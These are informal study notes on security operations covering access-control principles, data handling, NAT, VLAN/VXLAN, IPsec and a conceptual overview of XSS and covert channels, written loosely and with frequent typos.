Managing Security Operations
Primary Purpose of Security Operations is to secure the information assets, people and infrastructure.
# Key Concepts
Entitlement - Amount of privileges granted to the user
Aggregation/Authorization Creep - Amount of privileges that user collects overtime. Counter measure of this is User Entitlement review (UER)
Need to know - Access granted only to data resources they need to perform
Least Privilege - Access granted to the privileges necessary to perform the assigned task.Helps to prevent violation
Separation of Duties - Critical Jobs must not be done by one person.Helps to prevent violation.
Collusion - Two people committing a crime together
Job Rotation - Movement from one role to another
Mandatory Vacation - Sending employee to vacation
Privilege Account Management
# Managing Information Lifecycle
Create (Classify the data)-> Store -> Use -> Share -> Archive -> Destroy
- Service Level Agreement- SLA is usually an agreement between the organization and the vendor.It covers the performance expectations and includes penalties if the parties doesn't meet the expectation.
- Memorandum of Understanding - No Financial Stipulation is involved. Similar to SLA
Preventing and responding to incidents
Disaster Recovery Planning
Investigation and Ethics*
What is Sensitive Data?
# Personally Identifiable Information: Any information lead us to an individual is a PII.
# Protected Health Information: Any data elements related to the Health Information about the individual. HIPAA protects PHI
# Proprietary Data: Confidential data belonging to an organization. Example Intellectual Property, Merger Plans, Acquisition Plans etc.
# Data in Motion
Managing Sensitive Data
Marking or Labelling the Data, Secure transportation, storing sensitive data, destroying the data when no longer needed.
Methods of Removing Data
Roles & Responsibility related to Data
Purpose of NAT is to hide the internal IP. Purpose of using NAT Was to save the IPv4 Range. IPv4 is 32 bit.
Private IP Range
Class A- 10.x.x.x
Class B- 172.16.x.x - 172.31.x.x
Class C- 192.168.x.x
It also provides privacy as it conceals identity. Remember GDPR considers IP Address is PII.
Virtual LAN (vLAN): Logically segment a network without altering the physical topology
Virtual Desktop Technology:
- Remote Access
- Extension of Virtual Applications
- Storage area network
- Software Defined Network (Makes organization Vendor independent)
Virtual Extensible LAN (VXLAN):
As Organization are moving towards client, the requirement is that CSP (Cloud Service Provider). VXLAN allows you to segment your network and also solves the scalability limitation of VLAN's and provides benefits that VLAN Cannot.
- You can create 16 Million VXLAN (24 bit VNID) vs 4094 VLAN (12 Bit VNID)
We need VXLAN for the Scalability of VLAN
Stored XSS: Attacker will find the vulnerable website and inject a malicious code into it. When the users click on the page the malicious code automatically get downloaded.
XSS attack usually targets the blogs, forums - (Places where people can add comments).
There are three type of XSS:
1) Persistance/Stored XSS
2) Non Persistant/Reflective XSS
3) DOM based XSS Attack
Internet Protocol Security (IPSEC) is a standard architecture for setting up a secure channel between two entities.The entities can be anything like two system, two routers, two gateways or any other combination. IPsec uses Public Key Encryption to provide confidentiality, authentication, Integrity and Non-Repudiation.
IPsec relies of security association and there are two main associations:
1) Authentication Header (AH) - Provides assurance of Message Integrity and Non Repudiation.
2) Encapsulation Security Payload (ESP) - Provides confidentiality and Integrity of the packet content. Provides encryption and prevent replay attacks (Captures the packet and replay it later).
Primary use for the IPsec is for the VPN. IPsec can operation in Two Modes
1) Tunnel Mode - Message + Header is encrypted
2) Transport - Only message is encrypted
Covert Channels are the mechanism used to transmit information using not the originally intended for Data Transmission.
Generally Unauthorized and hidden used to send information that violates Information security policy.
*Covert Storage Channels* - They are a line of communication that can be seen by everyone but not understand by everyone. Processes are able to communicate through some type of storage on the system.
* Stagnograhy is a type of Covert Storage Channel. Example - Hiding a picture or a message inside a PDF Document.
*Covert Timing Channel* - One precess relays information to another by modulating the use of system resources. For example, mixing illegitimate traffic with legitimated traffic.
* Cache Timing Attacks
* Cache memory sits in between processor and memory. It is used for faster processing.